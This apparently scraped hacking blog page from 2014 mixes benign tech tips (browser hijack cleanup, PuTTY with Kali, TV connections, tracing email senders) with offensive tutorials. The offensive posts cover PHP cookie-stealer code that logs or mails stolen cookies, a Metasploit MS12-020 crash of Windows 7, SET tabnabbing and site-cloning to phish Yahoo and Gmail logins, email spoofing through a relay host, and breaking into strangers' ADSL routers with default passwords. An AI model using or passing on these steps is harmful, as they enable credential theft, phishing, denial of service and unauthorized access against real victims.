1. Update Your OS and Your Browser Software Ensuring that you have the latest and greatest version of your browserwith all of the latest security patches applied, will help prevent many internet borne attacks, especially the kind that exploit commonly unpatched vulnerabilities. Hackers are counting on you to be lazy and not patch your system. Simply running a quick software update can help shut down these points of entry. Browser makers are aware of the hijacking problem and may add new anti-hijacking features which is another reason to keep this software up to date.
See Also: Help! My Browser Has Been Hijacked
2. Use an Security Conscious Alternate DNS Resolution Provider Simply pointing your router's or computers DNS resolver to a non-ISP-provided server such as those mentioned in our article Improve Your Security By Using Alternative DNS Providers, may prevent the hijacking software from getting to its intended destination and it may also possibly prevent you from acquiring the hijacking malware in the first place. Check out the link above and learn the other many benefits of using Alternative DNS.
3. Use Your Antivirus Software's "Realtime Protection" Feature Some antivirus software offers a realtime protection feature that watches for attempts to change key configuration files, such as those associated with your browser. The software may alert you if something you're installing attempts to modify your browser settings. It may also offer you the opportunity to prevent the changing of these settings You should also make sure that your antimalware definition files are up to date, and you might want to consider adding a Second Opinion Scanner to add a second line of defense to your anti-malware protection detail.
4. Read The Fine Print Before You Install Any Software You Downloaded From The Internet and Opt Out of Bundled Extras (if allowed) As mentioned earlier, some browser hijacking software may come bundled with legitimate software. That's why it's important to read all the fine print about what you might be installing with the software you are downloading. Some companies will allow you to opt out of installing the bundled utilities that aren't needed for the software you are downloading to function. Some of the nicer makers of software that hijacks your browser will allow you to remove the software after it has been installed, but it has been my experience that most hijacking software does not want to leave your system quietly, even after you uninstall it, it may not undo the changes it made to your browser settings, which basically leaves your browser hijacked until you manually intervene by resetting your browser to it's pre-hijacked default settings.
Love this article?
Share it with your friends on Facebook

Help! My Browser Has Been Hijacked


You just tried to Google something but instead of getting a Google results page, your browser takes you to some sketchy-looking search engine that you've never heard of. The results it brings back are completely irrelevant and of no use. Clicking any of the links seems to take you to more useless sites cluttered with pop-ups, and endless redirects to other sites. What the heck is happening here? Your browser has just been hijacked. Malware and/or Ad-ware has taken control of your browser and is making it almost completely useless. Browser hijacking software may also work its way onto your system as a "bundled utility" that is often installed with freeware or shareware. Some companies will pay software developers to bundle their hijacking software in with other applications as a way to generate additional revenue for the software developer. This is a form of affiliate marketing. In addition to traditional affiliate marketing programs there are also elicit underground malware affiliate marketing programs that pay unscrupulous entrepreneurs money to infect systems with these hijacking tools and other assorted malware apps.
Read Also HTTP Session Hijacking Tutorial

Why Doesn't Antivirus Catch This Stuff
One reason your antivirus might not catch browser hijacking software is that hijacking apps are sometimes part of legitimate applications that you install, another reason is that not all hijacking tools are considered malware. They are annoying for sure, but they don't necessarily do harm to your PC, so anti malware software might overlook them.
What Should You do After You've Tried Traditional Antivirus And Your Browser Still Appears to be Getting Hijacked?

Get a Second Opinion Scanner
If your current anti malware didn't catch the hijacking software that made it onto your computer, consider installing a Second Opinion Scanner. A Second Opinion Malware scanner is exactly as the name implies. It provides a second line of defense to help catch malware that may have evaded your primary scanner.

Uninstall Suspicious Software
Some browser hijacking software applications may have been bundled into other legitimate apps that you have consciously installed which is one reason that made it by your anti malware scanner. The hijacking software may call itself a tool bar , search assistant or something else innocuous. It may even let you uninstall it without further trouble, but traditionally this software doesn't want to leave your system quietly and may leave traces of itself that attempt to re-establish control of your browser. Look in your list of installed applications and check for things that might be hijacking software. If something looks suspicious, Google it (on another device if yours is hijacked) and find out if it's a known hijacking app, you will likely find removal instructions in the search results as well.

Reset Your Browser
After your computer has been cleared of whatever malware infection is causing your browser to be hijacked or otherwise redirected, you'll likely need to reset your browser settings in order to return them to the home page and search engines that you prefer. This may require several visits to various configuration pages within your browser.
Check out the following official links for post hijacked browser reset procedures:
Google Chrome Hijacking Clean  Up Procedures [Official]
Internet Explorer Browser Reset Procedures [Official]
Firefox Browser Reset Procedures [Official]
Love this article?
Share it with your friends on Facebook

14/11/2014

How To Create Cookie Stealer Coding In PHP Get Via Email


Before you create Cookie stealer, it's important to know What are Cookies?

Here is the simple Cookie Stealer code
Cookie stored in File:
<?php $cookie = $HTTP_GET_VARS["cookie"]; $steal = fopen("cookiefile.txt", "a"); fwrite($steal, $cookie ."\\n"); fclose($steal); ?>$cookie = $HTTP_GET_VARS["cookie"];steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen("cookiefile.txt", "a"); This open the cookie file in append mode so that we can append the stolen cookie. fwrite($steal, $cookie ."\\n"); This will store the stolen cookie inside the file. fclose($steal);close the opened file.

Another version Sends cookies to the hacker mail
<?php $cookie = $HTTP_GET_VARS["cookie"]; mail("hackerid@ mailprovider.com", "Stolen Cookies", $cookie); ?> The above code will mail the cookies to hacker mail using the PHP() mail function with subject "Stolen cookies".

Third Version
<?php function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="log.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>"); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); ?> The above Cookie stealer will store the following information:
*. Ip address
*. port number
*. host(usually computer-name)
*. user agent
*. cookie
This site contains materials that can be potentially damaging or dangerous. If you are looking to comment a crime, you must leave this Page/site now! Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW!
Love this article?
Share it with your friends on Facebook

12/11/2014

Remotely Access Kali Terminal Using Putty

In this post we will use PuTTy to remotely or locally access Kali terminal with root priveleges. We will use SSH for this tutorial, though you can use Telnet or any other mode too.

Putty
Some theoretical inforamtion about putty for your digestion. PuTTY is an SSH and telnet client, developed originally by Simon Tatham for the Windows platform. PuTTY is open source software that is available with source code and is developed and supported by a group of volunteers. ( putty.org) PuTTY is a popular SSH and Telnet client that helps you establish secure connections over the Internet and doesn’t even require installation. It’s especially aimed for programmers and network administrators, which means that new comers won’t find it easy to use. The program features a simple, straight forward interface with no included documentation. Despite its apparent simplicity, PuTTY is highly configurable and includes many options to tweak connections, sessions, SSH security features and even the window’s appearance. (softpedia). Basically what you need to know is Putty works on Windows and will help you execute commands on Virtual install of Kali directly from Windows. It’s like a Kali terminal in Windows. What that means is if you have any configuration other than Windows Host and Kali Guest, then PuTTy isn’t going to be useful ( you can still use it for remotely running Kali, but the focus is on host guest mechanism here).

Download
You can download putty from putty.org That’s the official download location. Softpedia, CNET, etc. also provide downloads. You will find a lot of links there, and it will take a minute to find out what you need to download. However, for the sake of ease, the link below this line is likely to be what you are looking for.

Kali Configuration
There are a few things that need to be done before PuTTy starts working. Firstly, you would be using SSH to connect to Kali (main advantage of SSH is that it’s secure, you can search google for more info on SSH). By default, the SSH service isn’t started in Kali, but you can still check with
root@kali:~#service –status-all [ - ] ssh
It will display a long list. The–against ssh indicates it is not running. Depending on whether the SSH is installed or not, you can execute the following. Run the second command first, if it works fine the installation isn’t required, if not, then execute first command.
root@kali:~#apt-get install openssh-server(to install SSH) root@kali:~#service ssh start(to start the service)
Optional: If you are connecting remotely and are afraid that someone will eavesdrop your data, then you can use public private key encryption offered by SSH. For this you need to create an RSA key. root@Kali:~#ssh-keygen -trsa You will have to specify where to store the key (just press enter for default location) and then specify a key. This step is quite unnecessary for most users. Also, type ifconfig to get your eth0 ip address.

Starting PuTTy on Windows

Start Putty, and you will see a putty configuration dialog. Enter the IP that you found out in the last step. The port will be 22 and connection type SSH. Click open and you’ll be prompted to enter the credentials for terminal access. Type in ‘root’ and your password. You can run commands from here and they will be executed on your Kali machine. There are no functionality restrictions as such, and you can do almost anything from this terminal. Type exit to end the session.

Auto start SSH on Kali Boot

Now every time you will boot into Kali, the SSH service will not be running. You will have to type the following everytime to boot service ssh start. However, there are alternatives. One straight forward one is to go to Applications -> System Tools -> Preferences -> Startup Application and click on add. Enter the command asservice ssh start and add whatever you feel like for Name and Comment. Alternatively, you can use update-rc.d to get the same functionality. It helps add/remove services which will run at booting. Execute the following command to add SSH to startup services root@kali:~#update-rc.d ssh enable You can of course write your script to start ssh, but that wouldn’t do us much good since starting the service is as easy as one line of code and you don’t write scripts that execute just one command that is quite an inefficient way of using putty scripts.

11/11/2014

Connect a Laptop or Desktop Computer to a TV Easily

Suppose you wish to watch a movie or share a slide-show of pictures with your family on your PC but have a screen that leaves much to be desired. In such a situation, you can connect your computer to a television screen to allow your entire family to enjoy comfortably. There are many ways in which you can connect your laptop/computer to a television. However, the overall video quality will be different for different methods. You can choose which one to use based on the quality or the availability of hardware. The first step is to know what type of ports and connections your TV and computer have. If you already know the type of ports and connections available on your hardware, you can directly jump to Step 2. If not, then the different types of ports are explained in detail below

1. RCA/Composite: The oldest and the lowest quality connection available. They are the Yellow, Red and White connections most of us are familiar with. Yellow is used for composite video, white for left analog audio and red for right analog audio.
2. S-Video: S-Video or Super Video offers slightly better quality than Composite connections. As it is one of the oldest type of connections available, most televisions and computers have it. There are two types of S-Video ports, one containing 4 pins and the other containing 7 pins. This type of connection is used only for video. So you will need to connect an audio cable from your computer's headphone jack to the red and white audio inputs on your TV if you want audio to work.
3. VGA (Video Graphics Array): Most computers and televisions have a VGA port. It offers much better quality than S-Video and should be preferred if you have a HDTV. Older CRT TVs however, will not have a VGA port and will require a PC to Television converter. Just like S-Video, VGA also does not support audio and will require an additional audio cable.

4. DVI: Digital Video Interface offers much better quality than VGA connections. Most laptop computers and HD TVs will have these connections. Just as the name suggest, this type of connection can be used only with digital TVs. Also like the previous two, DVI connections also require the use of an audio cable for audio to work.
5. HDMI: The highest quality connections available. Most HD TVs will have this connection, however, chances are that your computer would not. If your computer happens to have a HDMI connection port, this should be preferably used. If your computer doesn't, you can use an HDMI to DVI adapter to convert HDMI to DVI.
Step 2: Once a common type of port between the two devices is recognized, you will need the right connector cable to physically connect them. The different types of connector cables are pictured above. If you do not find two matching types of connection ports, you will need an adapter to make the connections type match.
Step 3: After connecting the two devices, on your TV, select the external input with which your TV is connected to the computer. It may be HDMI1 or AV1 depending on how you have made the connection. This is much similar to how you select input from your DVD player. If you have followed the steps correctly, your TV should now be displaying your computer's screen.
Important: If your computer is not recognizing the external display, you must connect the TV before starting your computer. If the picture appears distorted, you will need to change the screen resolution of your TV by altering the display settings from your computer. Most older TVs will support only one display resolution while newer TVs will support plenty of them.
Love this article?
Share it with your friends on Facebook

10/11/2014

Penetration Testing: Crash Windows 7 Using Metasploit and RDC Vulnerability


Crashing Windows 7
Now while the story so far has been smooth and cozy, it gets a bit tough from here on. For modern operating systems like Windows 7, there aren’t any magical exploits like the ones we had for unpatched Windows XP machines. We had been able to hack Windows XPand try some meterpreter features on the exploited XP machine. However, when it comes to Windows 7, there aren’t any direct exploits for gaining access to the machine. We can try some client side attacks, etc. Social engineering toolkit would be great for stuff like that. However, there is still one vulnerability that waits to be exploited. In Windows 7, there is a hole in the RDP port (3389) which can work over LAN as well as over the internet. Over the internet stuff can get a bit tougher, however on the LAN, this should be a piece of cake if you have successfully followed out pentest tutorials so far.

Requirements
Now you will require an attacker Kali machine, and a victim Windows machine, both running on Virtual machines. Windows 7 should be a fresh install, with no updates, as they can patch the vulnerability, making it unexploitable. Now when you have got all this setup, you can move on to further steps.

Information Gathering
Now you’ll have to find out the IP of out victim. This would have been complicated in a real life scenario, but in our case, you just go to Windows 7, open command prompt, and type ipconfig You should be looking for IPv4 address of Local Area Network.

In our case thats where the information Gathering Stops.

Starting Metasploit
Now execute the following commands to start metasploit framework.
service postgresql start
service metasploit start
msfconsole

Exploit
Now select the exploit that we are going to be using.
auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Now do a show options, it will tell you that it only requires two options, RHOST and RPORT. Rport is obviously 3389, the remote desktop port. The RHOST is the one you found out in the information gathering step. use the following code to set the RHOST set RHOST 192.168.—.—
Surprising as it may seem, we are done already. Just type exploit and The target machine will get a Blue Screen of Death and will reboot. You can do this as many times as you feel like, and in real life scenario, it can be really annoying, considering it can be done over the internet too.

Possible Problems

If you get an error of this sort, then most probably your Windows 7 machine has firewall enabled, and is blocking your packets. An antivirus could do the same thing. There might be some issues with the LAN connection too. A good diagnosis test would be to ping the machine. Go to a kali terminal and execute ping 192.168.—.—
After waiting for a while, press ctrl C which will stop the pinging.

If you get something like this (0 packets received), then there is absolutely no communication between the Kali and Windows machine (in effect, they are not on the same network, even though they are). That’s why the exploit doesn’t work.

Something like this means that the connection is just fine, and probably the Windows machine has become immune to the attack due to some patch. Look Here If its the former case, then you’ll have to find a way to get the connection working, and if its the latter, then try disabling firewall, antivirus, and maybe setting the network as home instead of public. Then go to advanced sharing settings, and choose all the options that you think will make your computer easier to hack. If possible, see if you can uninstall updates. The final thing to do is to get an early unpatched release of Windows 7. In some cases installing VMware tools might help.

Enable Remote Desktop
In many Windows releases, remote desktop is turned off by default. To enable it, follow these steps:
Go to System Control Panel\System and Security\System). Click on Remote settings. Select the “Allow Remote Connections to this computer” button. Click OK.
Love this article?
Share it with your friends on Facebook

09/11/2014

Hack Into Emails And Facebook Using Kali Linux


Kali Linux is undoubtedly one of the most popular and advanced penetration testing platforms till date. Many or even most hackers prefer to use this platform for all their endeavours. Ethical hacking also is a much sought after field and here’s something that Kali Linux users will appreciate.
The following steps show how to clone email and Facebook using Backtrack 5 or Kali Linux.
1. Download Kali Linux from it's official Website.
2. Extract the contents of Kali Linux file which you downloaded in above step and copy it to pendrive or instead of pendrive burn the file in CD if you want to make a CD of it.
3. After copying the contents, reboot your system and press F8 on boot time then select boot from pendrive if you have copied all the files in pendrive else boot from CD-Rom if you burn the file in CD.
4. After selecting the boot from device, the kali installation window will open, install accordingly as per your requirement.
NOTE: During installation, in mount point of selected installation drive, set mount point to"/".
5. Remember the username and password while installation as this will be necessity for this hacking method.
6. Once the installation is completed, system will reboot and log into your account.
7. Your system is ready for use.
8. Open the backtrack terminal use the ifconfig command to find your IP address.
9. On the terminal type cd/pentest/exploits/set
10. You will need to have the Social Engineering Toolkit (SET) for this one.
11. Start this use and then choose the second option which says Website Attack Vectors.
12. In the next part you have to select the 4th option, which says Tabnabbing Attack Method.
13. Choose the second option, which is Site Cloner.
14. Now you have to enter the URL of the website that you want to clone or hack into. In this case the URL will be www.ymail.com. The SET will automatically create the clone. Press enter in order to continue.
15. The URL now needs to be converted into the Google URL. For this use goo.gl and send the link address to your targeted person via email, chat etc.
16. When your victim will open their internet browser for Gmail, they should get a message saying that the page is still loading. As soon as they open a new tab, the fake clone that we made will start functioning.
Once the process is completed, you will see something as shown in the image below.
The next step is the most important step, till now we have create the IP address go online and anyone who visit your IP address will see the page which will look like the website of whose url you entered to clone. In this step you need to shortened your IP address by using services like ADF.LY, Binbox, Goo.gl,etc. Once you enter your IP Address on these sites to shorten, they will provide you a link, all you need to do is just send this shortened link to your victim.
When the victim visit the url which you have sent, will see a same page of which url you had entered to clone. The victim will think that it is a original page and when the victim enters any of their information you will find it in the terminal.
In this example i have used ymail.com. Therefore, the victim will see homepage of yahoo mail.
If you get stuck anywhere give us your IP using this link in order to let us get control on your machine for remote kali setup. (We'll not take responsibiliy of any kind of demage caused by remote setup. you must do it at your own risk).
Love this article?
Share it with your friends on Facebook

08/11/2014

How to Find the Person Who is Behind an Email Address


You have received an email from a person with whom you have never interacted earlier and claiming that you have won some prize or amount in a lucky draw or maybe you’ve received an email that looks quite interesting. How do you do this without directly asking the other person? Before you can trust the sender via email and before sending your reply, it’s important that you properly identify the person who is associated with this email.
There are usually two methods that may be used to confirm the identity of a person associated to an email address. You can either use the sender’s email address or use the IP address of that email address to point out the possible location where it originated from. In this post, we’ll go over some methods based on tips and tricks to reveal the possible person behind the email address which have sent you an email.

Googling
Searching on Google as the first step. Copy the email address of sender and paste it in the Google search bar. If it is a scam or fraud, then there is a strong chance that you will find some information about it. If you don’t find any information on Google about the sender email and it appears to be a legitimate one, proceed with the tips mentioned ahead for the confirmation.
Indications of legitimacy: If you’re questioning the legitimacy of a particular email, here are some things to look out for that may indicate whether it’s real or fake:
The email address of the sender doesn’t match the website address of an organization through which he/she is claiming an offer.
The email is sent from a free web mail address.
Your name isn’t properly used in the email.
The email contains a sense of urgency regarding your reply or response.
The email contains a website link and you are asked to click on it. This link may be forged or may appear similar to the proper address (a minor spelling mistake makes it different altogether) of some legitimate web site and asks you to enter your personal information such as username, passwords, etc. These points will help you to make an educated guess that whether the sender is a real person or a fake person pretending to be real.
Read Also Phishing and it's defenses

Facebooking
To Confirm the Identity of A Person. According to Wikipedia Currently, Facebook has approximately 1.3 billion active users and an email address is required to become a registered Facebook user. So, there is a strong chance that you may find the owner of email address through Facebook. Simply, copy and paste the email address of the sender into the Facebook search bar and hit the search button. It will show you the profile associated with that email address. There is also a chance that you’ll get nothing in the search results.There are many fake Facebook profiles and you have to keep this in mind too. Scrolling through the timeline of a particular profile can help you figure out with ease whether the profile is real or fake.

Locate Email IP Address
An email does not only contain the information in the content but there’s also useful information that is not visible at first glance. This information contains the IP address of the sender as well. You can use this IP address to determine the country and city of the sender to get a better idea of sender's location.
To extract the IP address, open up the email header by clicking on the ‘Reply’ button and then click on ‘Show Original’ Once the email header is accessed then locate Received: From and you will find the IP address nearby it. Copy the IP address and paste it in IP address search bar of IP Location such as IP Location Finder-Geolocation to find the origin of the email.

Searching on all Famous Social Media Sites
Apart from Facebook, there are many other social media websites as well and you should check the email ID on all of them if you’re suspicious. If you start doing this task one by one on every social media website, then it will take a lot of time to go through all.

Search on Internet Directory
You can even use internet directories to search for people based on their emails. Pipl is one such free service that lets you reverse search for people based on their email addresses, phone numbers and names.
Share it with your friends on Facebook

07/11/2014

How to Send Spoofed Emails Anonymously


Most of us are very curious to know a method to send spoofed emails to our friends and family for fun. But the question is, is it possible to send spoofed emails in spite of the advanced spam filtering technology adopted by email service provides like Gmail, Yahoo etc? The answer is YES, it is still possible to bypass their spam filters and send spoofed emails anonymously to your friends or family members. For example, you can send an email to your friend with the following sender details.
From: Bill Gates
The art of sending this kind of email is known as Email Spoofing. One of the easy way to send a spoofed email is by using our own local SMTP server. In the past, I have tried SMTP servers like QK SMTP server. This method used to work successfully in those days, but as of now, it has a very low success rate since Gmail and Yahoo (all major email service providers) blocks the emails that are sent directly from a home computer.

How to Send Spoofed Emails
In this post, I have come up with a new method of sending spoofed emails to anyone without having to worry about being blocked or filtered as spam. In order to accomplish this, all you’ve to do is use a “relay server” while sending the spoofed emails.

What is a Relay Server
In simple words, a relay server is an SMTP Server that is trusted by major companies as an authorized sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorized, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason for which using our own SMTP server to send emails fail.

How to Find a Relay Server
Now, all we have to do is find a trusted SMTP server so as to send spoofed emails successfully. Usually, all the emails that are sent from web hosting providers are trusted and authorized. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free web hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However, all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it’s just a cake walk to send anonymous emails. All we have to do is just modify the email header to insert a fake From: address field into it. there is a PHP script that allows you to send emails from any name and email address of your choice. Here is a step-by-step procedure to setup your own anonymous email sender script:
1. Go to X10 Hosting and register a new account.
2. Download the script from the below link:
Download Anonymous Email Sender Script
3. Login to your Free Web Hosting Area Account and click on File Manager.
4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.
5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777
6. Now type the following URL:
http://yoursite.x10hosting.com/sendmail.php
7. Use the script to send spoofed emails anonymously to your friends and have fun.
Love this article?
Share it with your friends on Facebook

06/11/2014

How to Hack Ethernet ADSL (Asymmetric Digital Subscriber Line) Router

Almost half of the Internet users across the globe use ADSL (Asymmetric Digital Subscriber Line) to connect to the Internet. However, most of them are unaware of the fact that it has a serious vulnerability in it which can easily be exploited by anyone with a basic knowledge of computer. In this post, I will show you how to hack an Ethernet ADSL router by exploiting the common vulnerability that lies in it.
Every router comes with a user name and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in the Default user name and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access to the router and modify its settings using a common set of default usernames and passwords. Here is how you can do it. But before you proceed, you need the following tool in the process:
Angry IP Scanner

Hacking The ADSL Router
1. Go to whatismyipaddress.com. Once the page is loaded, you will find your IP address. Note it down.
2. Open Angry IP Scanner, here you will see an option called IP Range where you need to enter the range of IP address to scan for.
Suppose your IP Is:
117.192 .195.10 1, you can set the range something as 117.192 .194.0 to 117.192 .200.25 5 so that there exists at least 200-300 IP addresses in the range.
3. Go to Tools > Preferences and select the Ports tab. Under Port selection enter 80 (we need to scan for port 80). Now switch to the Display tab select the option Hosts with open ports only and click on OK.

4. Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image:

5. Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will pop up asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username and password pair will be admin-admin or admin-password. Now enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below:

If you do not succeed to gain access, select another IP from the list and repeat the step-5. At least 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.

What Can A Hacker Do By Gaining Access To The Router Settings?
By gaining access to the router settings, it is possible for an attacker to modify any of the router settings which results in the malfunction of the router. As a result the target user’s computer will be disconnected from the Internet. In the worst case the attacker can copy the ISP login details from the router to steal the Internet connection or even hijack the DNS by pointing it at a rouge DNS server If this happens, the victim will have to reconfigure/reset the router settings in order to bring it back to normal.
Note: If you are using an ADSL router to connect to the Internet, it is highly recommended that you immediately change your password to prevent any such attacks in the future. Who knows, you may be the next victim of such an attack. Since the configuration varies from router to router, you need to contact your ISP for details on how to change the password for your model.
Love this article?
Share it with your friends on Facebook
Please Write Ushow to improve this site